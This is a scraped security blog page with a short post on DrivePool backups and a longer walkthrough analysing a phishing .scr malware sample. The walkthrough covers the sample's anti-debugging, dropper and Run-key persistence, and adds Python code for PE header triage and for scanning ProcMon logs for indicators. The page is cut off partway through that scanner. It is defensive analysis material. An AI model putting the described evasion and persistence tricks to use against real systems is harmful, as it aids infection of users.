Micrmsoft blog (not affiliated with Microsoft)
The blog of Allison Nixon (@nixonnixoff), Brandon Levene (@SeraphimDomain), Mathew Ferreira, Travis Christainson (@suspiciouslow), and Nicholas Pence. Network, security, and tech related stuff. Not affiliated with Microsoft.
Allison Nixon, http://www.blogger.com/profile/07417179802217468668 (feed updated 2024-03-13)

Data backup and simple duplication (2018-02-24)
<span style="color: #999999;"><span style="color: #999999; font-family: "times" , "times new roman" , serif;">Disclaimer: RAID arrays with duplication protect against most drive failures, and depending on the setup can also protect against corruption of data. However, if all your data is physically located in one building, you can still lose everything. If your PSU decides it's tired of life and wants to take your system with it, you'll lose everything. If someone finds a bedbug in a different apartment and decides to burn the whole building to the ground, you'll lose everything. A real backup of your local data lives somewhere else: a NAS you control in another location, or a cloud storage system.</span></span><br />
<span style="color: #999999;"><span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><span style="color: #999999;"><br /></span></span></span></span>
<span style="color: #999999;"><span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><span style="color: #999999;">On the opposite side of the spectrum, you can maximize your backup safety and longevity at the expense of near total inaccessibility. Buy an LTO tape cartridge, marvel at the $14/TB price ratio, then cry when you see that a tape drive will set you back over $3k. Transfer your data and put the cartridges in an airtight stainless steel time capsule. Add some "DO NOT EAT" packets and seal it in a low humidity room. Bury it in the Los Angeles area for optimal storage temperatures. You can return any time within the next two to three decades, retrieve your data, and cry again as you realize your original tape drive has failed and you need a functioning piece of vintage hardware to retrieve your dog pictures and logs of high school IRC/AIM chats.</span></span></span></span><br />
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;">I've dreamed of having a full-on standalone NAS system for a long time. I wanted a very expandable zRAID setup with tolerance for two drive failures, running on FreeNAS or something comparable. The hardware requirements for FreeNAS seem reasonable at first glance, but after a little digging you will realize that a smoothly-performing system is going to require a LOT of ECC RAM. You'll also need enough SATA ports for all your drives. I recommend an expansion card with internal SAS ports, each of which can support 4 SATA ports via a breakout cable. You'll need an Ethernet controller that can handle the speeds you want. Throw in the case, PSU, CPU, a motherboard that can support all of the above, the drives themselves, and you have a very expensive system. Before buying anything, check the documentation for your NAS software to make sure all components are supported.</span></span><br />
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;">I couldn't justify all that to back up my meager 5TB of data, so I spent $30 on a license for Drivepool and $190 on a 6TB drive.</span></span><br />
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;">I had two 3TB drives I wanted to duplicate. The goal was protecting against a single drive failure. I assumed I could just turn on duplication and DrivePool would mirror them on the 6TB drive, but that's not how it works. DrivePool used the disks to create a pool as a lettered logical drive. Data has to be copied to the pool before it can be duplicated. I originally decided to partition the 6TB drive into two partitions and create two pools, each containing a 3TB drive and a new 3TB partition. After spending a day or two doing a completely unnecessary full format on these partitions, I realized that the partitions were pointless and it was simpler to leave each drive with a single partition and copy all three to one pool. I made sure duplication was turned off, copied the files to the pool, verified that all the data was on the pool, then deleted the original non-pool data, turned on duplication and let DrivePool do its thing.</span></span><br />
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;">Afterward, since all my files were accessible from the new lettered pool drive, I removed the letters of my 3TB drives since I no longer needed to directly access them. It uncluttered my drive list and DrivePool doesn't care if a drive is hidden or not.</span></span><br />
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;">The UI is simple and user-friendly, but I will note the few things that initially confused me. First, DrivePool sorts data into categories that are not self-explanatory at first glance. </span><a href="https://community.covecube.com/index.php?/topic/37-faq-unduplicated-vs-duplicated-vs-other-vs-unusable/&page=0#comment-189" style="font-family: times, "times new roman", serif;" target="_blank">This simple and helpful post</a><span style="font-family: "times" , "times new roman" , serif;"> was the clearest and most useful one I could find.</span></span><br />
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;">Helpful tip: When you are copying files, DrivePool will automatically limit the transfer rate to 40-50% of a disk's maximum I/O speed so that the drive will still be usable during the process. If you don't need this usability, there will be a ⏩ symbol to the right of the progress bar at the bottom of the window. Click it to allow DrivePool to remove the limiter and copy the files twice as fast.</span></span><br />
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #999999;"><span style="font-family: "times" , "times new roman" , serif;">Here is what my current pool looks like:</span></span><br />
<span style="color: #999999;"><span style="color: #999999; font-family: "times" , "times new roman" , serif;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLzmgkAUCAKv7u5CPM3PbwREXiQKTeKawFyNhF6GiFSDFxCjD8riNzkYvhzw_SUxAhyphenhyphentARFTLX1TIdErWG_KWTHDUDVD8PllyWEfKyWyQtfEeJjFljN9KU6kBxNH8bYgEclxsJriV_ZGiz/s1600/dpool.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="712" data-original-width="1600" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLzmgkAUCAKv7u5CPM3PbwREXiQKTeKawFyNhF6GiFSDFxCjD8riNzkYvhzw_SUxAhyphenhyphentARFTLX1TIdErWG_KWTHDUDVD8PllyWEfKyWyQtfEeJjFljN9KU6kBxNH8bYgEclxsJriV_ZGiz/s400/dpool.png" width="400" /></a><span style="color: #999999; margin-left: 1em; margin-right: 1em;"></span></div>
<div>
<br /></div>
Posted by Nick Pence (http://www.blogger.com/profile/10647971187331096920)

Malware Analysis In Situ (2013-06-12)
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.blogger.com/blogger.g?blogID=5498034097070054412" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.blogger.com/blogger.g?blogID=5498034097070054412" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.blogger.com/blogger.g?blogID=5498034097070054412" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<a href="http://www.blogger.com/blogger.g?blogID=5498034097070054412" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=5498034097070054412" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><i>Preface: I am by no means a "professional" malware analyst, and I'm sure there are easier ways to analyze samples (including just throwing the following sample at a sandbox). This was more of a live-fire exercise.</i><br />
<br />
<a href="http://www.blogger.com/blogger.g?blogID=5498034097070054412" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><br />
Besides drive-by downloads, typically delivered through exploit kits, one of the most common vectors for delivering malware is email. Last week I received a typical message promising to contain deposit slips in a .rar file. Instead of trashing it or uploading it to a public sandbox, I decided to take a peek at the sample's functionality using a variety of techniques. Some of these have been covered in previous articles (<a href="http://micrmsoft.blogspot.com/2013/02/malware-analysis-101-part-1.html">Malware Analysis 101 Part 1</a>, <a href="http://micrmsoft.blogspot.com/2013/02/malware-analysis-101-part-2.html">Malware Analysis 101 Part 2</a>, <a href="http://micrmsoft.blogspot.com/2013/02/malware-analysis-101-part-3.html">Malware Analysis 101 Part 3</a>) while others will be somewhat more advanced. First we'll start with static analysis in <a href="http://www.dependencywalker.com/">Dependency Walker</a> and <a href="https://www.hex-rays.com/products/ida/index.shtml">IDA Free</a>. Then we'll move on to <a href="http://www.ollydbg.de/">OllyDbg</a>. Next up will be behavioral analysis within the analysis VM using <a href="http://www.thebaskins.com/main/component/content/article/15-work/60-noriben-your-personal-portable-malware-sandbox">Brian Baskin</a>'s <a href="https://github.com/Rurik/Noriben/blob/master/Noriben.py">Noriben.py</a> (with <a href="http://practicalmalwareanalysis.com/fakenet/">FakeNet</a> standing in for a "real" internet connection). Finally, I'll share the report from malwr.com to see what indicators we may have missed throughout the above process.<br />
<br />
<br />
<u><b>The File</b></u><br />
Originally the sample was attached to an email as a password-protected .rar 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO7E-mCabT3EqPKuTm0trR3-5S967-UsrPVz6yPK-S3IkSAkQIsSwz73_AJQGgcfhy2KQfCFtwNX23Hx678WaPOXHuSGGB60I7CFBAMHKKeY7s2toFgyIe9YIh3GYca7HRLIYx20MURbQe/s1600/1MalwarePDFIcon.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO7E-mCabT3EqPKuTm0trR3-5S967-UsrPVz6yPK-S3IkSAkQIsSwz73_AJQGgcfhy2KQfCFtwNX23Hx678WaPOXHuSGGB60I7CFBAMHKKeY7s2toFgyIe9YIh3GYca7HRLIYx20MURbQe/s1600/1MalwarePDFIcon.jpg" /></a></div>
archive (md5: e5176acddc19b5fc7e561c41648f7eb1). The password was included in the body of the spam message. This is a common evasion: a mail gateway cannot inspect the contents of an encrypted archive, so unless it rejects encrypted archives outright, the payload passes straight through. Inside the .rar file is an executable (md5: 93305ed2d617888501c034b1208e97ba) with the extension ".scr" (Windows screensaver, which is simply a PE executable that runs on double-click) and an icon copied from Adobe's PDF document icon (exploring the .rsrc section of the PE shows that it is the same icon). This mismatch is pretty typical, and since Windows hides known extensions by default most users would only ever see the PDF icon, but it is jarring enough that it should raise the hackles of anyone paying attention.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_JEYiiRpfYmBxBgQXMOfkWmPTstiEIFDaUc-CryNOmJa_xjMlcgirWE7TFWedfFEUAVXCRfWiT3sfjtjlIQHeJ9wJV42UU0IZOP176ZTVD6a7GpoZET_y_wSKqzW_gPR9IoKLRYzqP1_N/s1600/2MalwareHexHeader.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_JEYiiRpfYmBxBgQXMOfkWmPTstiEIFDaUc-CryNOmJa_xjMlcgirWE7TFWedfFEUAVXCRfWiT3sfjtjlIQHeJ9wJV42UU0IZOP176ZTVD6a7GpoZET_y_wSKqzW_gPR9IoKLRYzqP1_N/s320/2MalwareHexHeader.jpg" width="320" /></a></div>
<br />
<br />
<u><b>Static Analysis</b></u><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwhb27vku5AV3pQHhl24OWuSIzpVC4BS4Wj5oaZvL_MP9Gym1L9ubhKmzwnxdaOmjUiA-9OTEyCwqY7jz7df8FfhmGOZiKmpRq3Rm8k3CunxCirYDsyL8CnFgtDvzBYu7n3L0_tEpZt8qK/s1600/3MalwareDepWalker.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwhb27vku5AV3pQHhl24OWuSIzpVC4BS4Wj5oaZvL_MP9Gym1L9ubhKmzwnxdaOmjUiA-9OTEyCwqY7jz7df8FfhmGOZiKmpRq3Rm8k3CunxCirYDsyL8CnFgtDvzBYu7n3L0_tEpZt8qK/s320/3MalwareDepWalker.jpg" width="320" /></a>Browsing the imports in Dependency Walker reveals some interesting information. We see some interesting imports from KERNEL32.dll one that shares similarity to <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682411%28v=vs.85%29.aspx">CreateMutex</a>; <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682608%28v=vs.85%29.aspx">EnterCritcalSection</a>. From this information we can assume that the sample uses a critical section object for mutual-exclusion synchronization (from MSDN). Additionally we see <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms683156%28v=vs.85%29.aspx">GetCommandLineA</a> indicating that this sample interacts with the command line at some stage. What you can't see in the above image (due to the number of API calls) is the import of <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms680345%28v=vs.85%29.aspx">IsDebuggerPresent</a>, which may indicate this sample has built in anti-analysis abilities. One additional interesting import is <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa376389%28v=vs.85%29.aspx">CheckTokenMembership</a> (from ADVAPI32.dll), which attempts to enumerate the security information for a logon session. Unfortunately, I don't see any indication of a networking component, so its time to dig deeper.<br />
<br />
<br />
Before moving on, let's get a better look at the PE headers using CFF 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOLlrE6HFWpFFzqgTd9fmnGPsi52TMOKEGs0-zyIgGesJSVMgP-zFGULVQkw2WVFF69kXuH-WAKH-XBbEXc9wbt9SDPSa5aT7h4Ci3Bh8JE7SqX2IPetmZxr2xINwIlLo3Qm31gehl4e_k/s1600/4MalwareCFFExplorer.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOLlrE6HFWpFFzqgTd9fmnGPsi52TMOKEGs0-zyIgGesJSVMgP-zFGULVQkw2WVFF69kXuH-WAKH-XBbEXc9wbt9SDPSa5aT7h4Ci3Bh8JE7SqX2IPetmZxr2xINwIlLo3Qm31gehl4e_k/s320/4MalwareCFFExplorer.jpg" width="306" /></a></div>
Explorer. There isn't a ton more information to glean from this view, but it is interesting to note that the sample doesn't appear to be packed (see the entry point, labelled OEP, at 0x0008857). We can also confirm that this is a PE32 executable regardless of the .scr extension, if the tell-tale MZ (see Hex View above) wasn't confirmation enough. CFF also offered some additional insight into the .rsrc section of the file, which included an unknown resource type "XZZDO" at offset 0x8000058. I'm not sure what this actually is, but as we will see below, the resources in this section, "LLMPWU" and "MAAYVD", are referenced by name as parameters in the malware's code. Also in the .rsrc section we see the PDF icons as well as an application manifest requesting the "asInvoker" execution level, meaning the sample does not ask for elevation and runs with whatever privileges the user already has.<br />
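As an added example (not code from the original post, and not what CFF Explorer does internally), here is a standard-library PE header triage that reproduces the checks above: the MZ and PE signatures, the PE32 vs PE32+ magic, entry point, subsystem and section table, a coarse "entry point outside a normal code section" packing heuristic, and a flag when the filename's extension does not match the fact that the file is a PE. The bytes it parses are a constructed minimal PE32 image, not the sample; the filename and the 0x8857 entry point are placeholders chosen to mirror the post.

```python
"""Triage the PE headers of a suspect file with nothing but the standard library.

Added example, not from the original post and not CFF Explorer code: checks the
MZ/PE signatures, reads the optional-header magic (PE32 vs PE32+), entry point,
subsystem and section table, and flags an extension that does not match a PE
plus a coarse packing heuristic.  The sample bytes are a constructed minimal PE.
"""
import os
import struct

MACHINES = {0x14C: "i386", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "ARM64"}
MAGICS = {0x10B: "PE32", 0x20B: "PE32+"}
SUBSYSTEMS = {1: "native", 2: "windows_gui", 3: "windows_cui"}
# Extensions Windows will run as a PE on double-click; .scr is the screensaver one.
EXECUTABLE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".cpl", ".ocx", ".drv", ".com"}


def parse_pe(data):
    """Return header facts for a PE image, or {'is_pe': False, ...} if it isn't one."""
    if data[:2] != b"MZ":
        return {"is_pe": False, "reason": "no MZ signature"}
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return {"is_pe": False, "reason": "no PE signature at e_lfanew"}
    machine, nsections, _stamp, _symtab, _nsyms, opt_size, _chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                                       # after the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", data, opt)
    (entry,) = struct.unpack_from("<I", data, opt + 16)       # AddressOfEntryPoint (RVA)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)   # same offset for PE32 and PE32+
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        name, vsize, vaddr, rawsize, rawptr, _r, _l, _nr, _nl, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr,
                         "vsize": vsize, "rawsize": rawsize, "rawptr": rawptr,
                         "executable": bool(chars & 0x20000000)})   # IMAGE_SCN_MEM_EXECUTE
    entry_section = next((s for s in sections
                          if s["vaddr"] <= entry < s["vaddr"] + max(s["vsize"], s["rawsize"])), None)
    return {"is_pe": True, "machine": MACHINES.get(machine, hex(machine)),
            "magic": MAGICS.get(magic, hex(magic)), "entry_point": entry,
            "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
            "sections": sections, "entry_section": entry_section}


def looks_packed(info):
    """Coarse heuristic: a packed file's entry point usually sits outside the normal code
    section, or in a section that occupies no space on disk (filled in at run time)."""
    sec = info.get("entry_section")
    if sec is None:
        return True
    return sec["rawsize"] == 0 or not sec["executable"] or sec["name"] not in (".text", "CODE")


def triage(data, filename):
    """Combine the header facts with the extension the attacker chose for the file."""
    info = parse_pe(data)
    ext = os.path.splitext(filename)[1].lower()
    info["extension"] = ext
    info["notes"] = []
    if not info["is_pe"]:
        return info
    info["looks_packed"] = looks_packed(info)
    if ext == ".scr":
        info["notes"].append("extension .scr (screensaver) is still a PE that runs on double-click")
    elif ext not in EXECUTABLE_EXTENSIONS:
        info["notes"].append(f"file is a PE executable but is named as {ext or 'no extension'}")
    if info["looks_packed"]:
        info["notes"].append("entry point outside a normal code section: possibly packed")
    return info


def build_constructed_pe():
    """A minimal, non-runnable PE32 image with a .text and a .rsrc section (constructed)."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                         # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)  # i386, 2 sections, 224-byte opt hdr
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<I", opt, 16, 0x8857)                         # AddressOfEntryPoint (placeholder)
    struct.pack_into("<I", opt, 28, 0x400000)                       # ImageBase
    struct.pack_into("<H", opt, 68, 2)                              # IMAGE_SUBSYSTEM_WINDOWS_GUI

    def section(name, vsize, vaddr, rawsize, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)

    text = section(b".text", 0x10000, 0x1000, 0x10000, 0x400, 0x60000020)   # CODE|EXECUTE|READ
    rsrc = section(b".rsrc", 0x2000, 0x11000, 0x2000, 0x10400, 0x40000040)  # INITIALIZED_DATA|READ
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text + rsrc


if __name__ == "__main__":
    result = triage(build_constructed_pe(), "deposit_slip.pdf.scr")
    print(result["magic"], result["machine"], hex(result["entry_point"]), result["subsystem"])
    print("entry in", result["entry_section"]["name"], "| packed?", result["looks_packed"])
    for note in result["notes"]:
        print("-", note)
```

The packing heuristic is deliberately crude (a packer that keeps the section named .text will slip past it); the point is that the entry point's section, its raw size and its characteristics are all readable without a tool, which is exactly what CFF Explorer is showing in the screenshot.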
<br />
<u><b>Start Function</b></u><br />
<br />
Let's move on to a brief session with IDA Free 5.0. Checking out the graph view 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWWA9UmOJ8qEyfsejf_23OwwqpLELi7y2WZVhnSCgQtN42NCmpRJTnGhLPyzLrUHRPrwfFY3R68WDoImvu_Pds89LTzfXCSsJso7N9C3P0jI0o_RpkonZLs3Efa7A4WdEtM-rFkJCtfnIo/s1600/5MalwareIdaFree.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWWA9UmOJ8qEyfsejf_23OwwqpLELi7y2WZVhnSCgQtN42NCmpRJTnGhLPyzLrUHRPrwfFY3R68WDoImvu_Pds89LTzfXCSsJso7N9C3P0jI0o_RpkonZLs3Efa7A4WdEtM-rFkJCtfnIo/s320/5MalwareIdaFree.jpg" width="320" /></a></div>
of the start function, we can see a call to GetCommandLineA followed by calls to two subroutines: one enumerates the environment strings, the other retrieves the name of the running module. Immediately below that we see a jns instruction (jump if not sign) which, if NOT taken, leads to the function on the right. That function leads into a number of DecodePointer calls. These are not obfuscation added by the malware author: the MSVC C runtime's startup code uses EncodePointer/DecodePointer to protect its own function pointers, so seeing them in start is normal for any Visual C++ binary. Unfortunately, this doesn't tell me a whole lot, since my experience with disassembly is lacking, at best, and picking through the runtime's startup code is unlikely to be fruitful; the sample's real anti-debugging behavior shows up once it is run under a debugger below. Continuing to delve deeper into the sample using the handy "Names" window we observe an interesting call to "Sleep" (its argument, shown in hex in the disassembly, is a delay in milliseconds). We will see during the behavioral analysis why this <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfPqfqgNLiDr4ifI4rGpmW5yixcLsWmROUse259rK11NaS_vy7H4Tx3reX7dRSY6DJg7-2LHdBpWD1FWHFcULbWQRoSjM_kWCUCzUXIdW64c7VS106ATTJZ1Y9d2n0yiX3o57PBdgaq6HY/s1600/6MalwareDebuggerTrap.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfPqfqgNLiDr4ifI4rGpmW5yixcLsWmROUse259rK11NaS_vy7H4Tx3reX7dRSY6DJg7-2LHdBpWD1FWHFcULbWQRoSjM_kWCUCzUXIdW64c7VS106ATTJZ1Y9d2n0yiX3o57PBdgaq6HY/s320/6MalwareDebuggerTrap.jpg" width="320" /></a></div>
is important. For now, I know I'm in over my head, and I need to see the networking component. Let's see if a debugger will help (hint: it won't).<br />
<br />
Running the sample in OllyDbg results in a crash (remember that jns I pointed out? That's what leads to the "crash"), but check out the value of ECX: "CreateProcessW". Setting a breakpoint at the push -1 following this crash results in an infinite loop. This tells us that this behavior is likely intentional: rather than run its payload inside the process being debugged, the sample spawns a new one, which OllyDbg will not follow. In fact, looking at ProcMon (which I generally keep running during debugging) I can see that an additional process was spawned and that this "crash" appears to be a simple <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcLm4zofw4UBHBDam_Vd_J6nJpsXJGNodJNroa7dPRoZUJaDlB3FIEyE_LLK_qz9dWo_2HhaXYC2LYTjqN-kSWd1OY58K7Dr3Mvd4gNy1oJ_5GU_JOFxPijEB0bXgs8DqB5PPx_DNgVPJG/s1600/7MalwareOllyDbg.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcLm4zofw4UBHBDam_Vd_J6nJpsXJGNodJNroa7dPRoZUJaDlB3FIEyE_LLK_qz9dWo_2HhaXYC2LYTjqN-kSWd1OY58K7Dr3Mvd4gNy1oJ_5GU_JOFxPijEB0bXgs8DqB5PPx_DNgVPJG/s320/7MalwareOllyDbg.jpg" width="320" /></a></div>
dropper component which builds a second executable file under C:/Users/Documents and Settings. Let's move on to behavioral analysis. Since I suspect the VM is now compromised due to my debugging, I'm going to wipe it (revert to a clean snapshot) before proceeding.<br />
<br />
<u><b>Behavioral Analysis</b></u><br />
<br />
Now that my analysis VM is back in pre-infection condition, let's prepare the environment prior to running the malware. First up is FakeNet, which answers the sample's DNS queries with the local host and listens on common ports so that the sample believes it has a working internet connection, and then it's time to fire up Noriben.py. Noriben is a script by Brian Baskin that takes advantage of the excellent ProcMon and its filtering capabilities in order to produce a CSV timeline and a .txt report. Let's see what it turns up when this sample is run. Running the script is simple: browse to its location, invoke Noriben.py, then execute the sample. FakeNet will capture any packets to a .pcap which we can review later. Since there was an embedded Sleep call (3000ms), I suspect this sample lies dormant for a little while, so I let Noriben run for a few minutes following execution.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKl92MzjXWfuiuDCSyFMJwZGufKGcPK8uTxj7MK_vBAeuwQ5ODxlebygTi5ZhXYzj0-QC1MoLWE2LX6cEhacWetw3ydIMsSw62lFrOM9liOu_B6lMZvj95hvAUzxGLjM3ln88UI0nl30bh/s1600/8MalwareNoribenAndFakeNet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKl92MzjXWfuiuDCSyFMJwZGufKGcPK8uTxj7MK_vBAeuwQ5ODxlebygTi5ZhXYzj0-QC1MoLWE2LX6cEhacWetw3ydIMsSw62lFrOM9liOu_B6lMZvj95hvAUzxGLjM3ln88UI0nl30bh/s320/8MalwareNoribenAndFakeNet.jpg" width="312" /></a></div>
<br />
After giving the sample ample time to stew, a quick Ctrl-C stops Noriben and converts the ProcMon log into separate .csv and .txt files. Browsing the .txt file shows some interesting results. First we see that this sample dropped a byte-identical copy of itself to %AppData% (the MD5, 93305ed2d617888501c034b1208e97ba, matches the original). We also see iexplore.exe spawned as a child process of the sample, as well as a call to svchost.exe. There were also several notepad.exe processes spawned as children of the sample's process. Finally, we see registry modifications creating an autorun value named "Adobe Reader Speed Launcher" (the same name as the legitimate Adobe Reader startup entry) that points to the dropped Ad0be.exe (note the zero; md5: 93305ed2d617888501c034b1208e97ba); that solves the question of persistence. So that takes care of the networking, dropper, and persistence components. What else did we see?<br />
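Each of the findings in that paragraph is something a short script can pull out of the ProcMon CSV that Noriben consumes. As an added example (not the post's code and not Noriben's), the block below scans constructed ProcMon-style rows for an executable written under a user-writable directory, a Run-key value pointing into such a directory (including the "Ad0be" digit-for-letter lookalike), and iexplore.exe or svchost.exe being spawned by something other than their usual parent. The rows, PIDs, paths and process names are constructed for the demo; the real report's contents are not reproduced here.

```python
"""Pull the host-based indicators the post found by hand out of a ProcMon-style CSV.

Added example, not from the original post and not Noriben's code.  Scans rows in
ProcMon's CSV export layout for three things: an executable written under a
user-writable directory, a Run-key value pointing into one (and a vendor-name
lookalike such as Ad0be), and system binaries spawned by an unusual parent.
All log lines below are constructed; paths and PIDs are placeholders.
"""
import csv
import io
import re

# Constructed ProcMon-style export (Time of Day, Process Name, PID, Operation, Path, Result, Detail).
SAMPLE_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02","deposit_slip.scr","1234","Process Create","C:\\Windows\\System32\\notepad.exe","SUCCESS","PID: 1300, Command line: notepad.exe"
"10:01:03","deposit_slip.scr","1234","WriteFile","C:\\Users\\victim\\AppData\\Roaming\\Ad0be.exe","SUCCESS","Offset: 0, Length: 61,440"
"10:01:03","deposit_slip.scr","1234","RegSetValue","HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Adobe Reader Speed Launcher","SUCCESS","Type: REG_SZ, Length: 88, Data: C:\\Users\\victim\\AppData\\Roaming\\Ad0be.exe"
"10:01:06","deposit_slip.scr","1234","Process Create","C:\\Program Files\\Internet Explorer\\iexplore.exe","SUCCESS","PID: 1350, Command line: iexplore.exe"
"10:01:06","deposit_slip.scr","1234","Process Create","C:\\Windows\\System32\\svchost.exe","SUCCESS","PID: 1360, Command line: svchost.exe"
"10:01:07","explorer.exe","800","Process Create","C:\\Program Files\\Internet Explorer\\iexplore.exe","SUCCESS","PID: 1400, Command line: iexplore.exe"
"10:01:08","AcroRd32.exe","900","RegSetValue","HKCU\\Software\\Adobe\\Acrobat Reader\\11.0\\AVGeneral\\bLastExitNormal","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
"""

RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(AppData|Local Settings|Temp|Users\\Public)\\", re.IGNORECASE)
# Legitimate parents for these binaries; anything else spawning them deserves a second look.
WATCHED_CHILDREN = {"iexplore.exe": {"explorer.exe"}, "svchost.exe": {"services.exe"}}
LOOKALIKE_TARGETS = {"adobe", "microsoft", "google", "java", "windows"}
LEET = str.maketrans("01345", "oleas")   # digits attackers swap in for letters


def deleet(name):
    return name.lower().translate(LEET)


def lookalike(text):
    """Return the token impersonating a vendor name via digit-for-letter swaps, or ''."""
    for token in re.findall(r"[A-Za-z0-9]+", text):
        if token.lower() not in LOOKALIKE_TARGETS and deleet(token) in LOOKALIKE_TARGETS:
            return token
    return ""


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def scan_procmon_csv(text):
    """Return a list of (rule, process, path, note) findings in log order."""
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        proc, op, path, detail = row["Process Name"], row["Operation"], row["Path"], row["Detail"]
        if (op == "WriteFile" and path.lower().endswith((".exe", ".dll", ".scr"))
                and USER_WRITABLE.search(path)):
            findings.append(("dropped_executable", proc, path, ""))
        if op == "RegSetValue" and RUN_KEY.search(path):
            data = detail.split("Data: ", 1)[1] if "Data: " in detail else ""
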